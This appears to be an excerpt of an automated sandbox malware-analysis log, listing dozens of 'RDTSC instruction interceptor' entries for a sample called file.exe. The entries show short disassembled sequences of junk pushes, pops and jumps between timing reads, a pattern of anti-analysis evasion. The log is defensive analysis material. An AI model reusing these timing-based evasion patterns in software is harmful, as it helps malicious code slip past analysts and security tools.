              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2FC2 second address: 9E2FCC instructions: 0x00000000 rdtsc 0x00000002 js 00007F3BAC7E5E0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E346F second address: 9E347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F3BACE24FDAh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99081F second address: 990823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990823 second address: 990830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990830 second address: 990834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E35F2 second address: 9E35F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E35F6 second address: 9E360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3BAC7E5E0Bh 0x0000000c jp 00007F3BAC7E5E06h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E360F second address: 9E361C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007F3BACE24FD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E361C second address: 9E362A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA3D3 second address: 9EA3DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA6DD second address: 9EA6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA6E5 second address: 9EA6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA6E9 second address: 9EA6F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3BAC7E5E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA6F3 second address: 9EA708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3BACE24FDBh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA708 second address: 9EA70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA70C second address: 9EA712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA712 second address: 9EA734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3BAC7E5E12h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F3BAC7E5E06h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA9F9 second address: 9EA9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB52E second address: 9EB564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E19h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007F3BAC7E5E11h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB564 second address: 9EB568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB85D second address: 9EB863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB863 second address: 9EB871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3BACE24FF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBE7F second address: 9EBE88 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F08DF second address: 9F08E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F08E3 second address: 9F08ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3BAC7E5E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F08ED second address: 9F08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F3BACE24FDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F08FB second address: 9F0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0903 second address: 9F0909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0909 second address: 9F090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3B6B second address: 9F3B75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3B75 second address: 9F3B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3BAC7E5E06h 0x0000000a jc 00007F3BAC7E5E06h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3B85 second address: 9F3BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3E59 second address: 9F3E5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3FAF second address: 9F3FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3BACE24FD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4118 second address: 9F4122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4122 second address: 9F412E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F412E second address: 9F4145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E11h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB6A3 second address: 9FB6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3BACE24FD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB6AD second address: 9FB6B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB6B3 second address: 9FB6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB6BC second address: 9FB6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3BAC7E5E06h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB81D second address: 9FB837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3BACE24FDFh 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB837 second address: 9FB83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD24 second address: 9FBD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD2B second address: 9FBD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3BAC7E5E0Ch 0x0000000e jmp 00007F3BAC7E5E16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD5D second address: 9FBD71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD71 second address: 9FBD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E16h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD8B second address: 9FBD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD8F second address: 9FBDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E11h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBDAA second address: 9FBDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBDAE second address: 9FBDCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E17h 0x00000007 jc 00007F3BAC7E5E06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC074 second address: 9FC078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC078 second address: 9FC097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F3BAC7E5E06h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC097 second address: 9FC0A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3BACE24FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC0A1 second address: 9FC0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3BAC7E5E11h 0x0000000c jnl 00007F3BAC7E5E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC0C1 second address: 9FC0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC37C second address: 9FC384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC384 second address: 9FC39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3BACE24FDEh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC39B second address: 9FC3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3BAC7E5E06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC3A7 second address: 9FC3C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3BACE24FDEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC3C5 second address: 9FC3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC54A second address: 9FC555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3BACE24FD6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FCE19 second address: 9FCE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FCE1D second address: 9FCE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F3BACE24FDDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD4E8 second address: 9FD522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E0Ah 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3BAC7E5E10h 0x0000000f jmp 00007F3BAC7E5E14h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B6E9 second address: 94B6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14252 second address: A14256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13DCD second address: A13DEA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F3BACE24FD6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jno 00007F3BACE24FD6h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13DEA second address: A13E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F3BAC7E5E08h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F3BAC7E5E06h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13E04 second address: A13E0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95065E second address: 950690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3BAC7E5E16h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950690 second address: 95069A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24F3C second address: A24F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24F40 second address: A24F46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24F46 second address: A24F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F3BAC7E5E08h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CFA1 second address: A2CFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3BACE24FDCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B899 second address: A2B8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BB5A second address: A2BB5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BB5F second address: A2BB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3BAC7E5E06h 0x0000000a pop edi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BCDF second address: A2BCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3BACE24FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BCEA second address: A2BCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BCF7 second address: A2BD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F3BACE24FE6h 0x0000000b jns 00007F3BACE24FD6h 0x00000011 jmp 00007F3BACE24FDAh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BD16 second address: A2BD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C214 second address: A2C219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A305F6 second address: A30601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30601 second address: A30607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30607 second address: A30610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CE71 second address: A4CE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F3BACE24FD6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CE7E second address: A4CE8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CE8B second address: A4CE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A653E1 second address: A653FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A653FE second address: A65412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3BACE24FDDh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65412 second address: A6541E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6412E second address: A64149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007F3BACE24FDCh 0x0000000b jng 00007F3BACE24FD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F3BACE24FD6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642B1 second address: A642B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642B7 second address: A642BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642BB second address: A642DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F3BAC7E5E1Bh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642DC second address: A64325 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3BACE24FE4h 0x00000008 push edx 0x00000009 jmp 00007F3BACE24FE8h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3BACE24FE2h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64325 second address: A64335 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64335 second address: A64339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
